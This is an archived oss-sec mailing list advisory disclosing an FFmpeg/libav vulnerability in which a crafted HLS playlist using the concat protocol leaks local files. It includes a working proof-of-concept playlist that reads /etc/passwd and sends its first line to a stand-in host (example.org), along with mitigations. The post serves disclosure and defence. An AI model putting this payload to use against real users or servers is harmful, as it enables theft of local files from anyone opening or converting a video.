oss-sec mailing list archives
Fwd: FFmpeg: stealing local files with HLS+concat
From: Vladimir Dubrovin <vlad () securityvulns ru>
Date: Wed, 13 Jan 2016 14:01:55 +0300
---------- Forwarded message ---------- From: Максим Андреев <andreevmaxim () gmail com> Date: 13 January 2016 at 13:41 Subject: FFmpeg: stealing local files with HLS+concat To: oss-security () lists openwall com Hello! I found some strange behavior in ffmpeg which can lead to stealing local files during ffmpeg/ffprobe exec, it's also applied to libav. I've underestimated the impact of this bug, so it was full disclosured in this article (Russian language, but google translate works fine with it) - http://habrahabr.ru/company/mailru/blog/274855 In short: if linux user download specially prepared video file (with any extension: avi/mov/etc..) which contains HLS m3u8 playlist with "concat" protocol in url:, #EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://dx.su/header.m3u8|file:///etc/passwd #EXT-X-ENDLIST header.m3u8: #EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:, http://example.org? If user launches ffmpeg-based video player (MPlayer, etc..), first line of /etc/passwd will be sent to http://example.org? in http://example.org?# $FreeBSD: release/100.0/et.. request. The same happens when file manager tries to generate thumbnail for this file. All this can be applied to server-run ffmpeg during video conversion. FFmpeg/libav security teams are already notified, but official patches are not available yet, so you can rebuild ffmpeg with --disable-network configure option which prevents this vulnerability from being exploited. Moreover, it's always recommended to run ffmpeg in isolated environment when processing untrusted files (googleonlinesecurity.blogspot.ru/2014/01/ffmpeg-and-thousand-fixes.html) -- Maxim Andreev
Current thread:
- Fwd: FFmpeg: stealing local files with HLS+concat Vladimir Dubrovin (Jan 13)
- Re: Fwd: FFmpeg: stealing local files with HLS+concat Alexander Cherepanov (Jan 13)
- Re: Fwd: FFmpeg: stealing local files with HLS+concat cve-assign (Jan 14)
- Re: Fwd: FFmpeg: stealing local files with HLS+concat Alexander Cherepanov (Jan 13)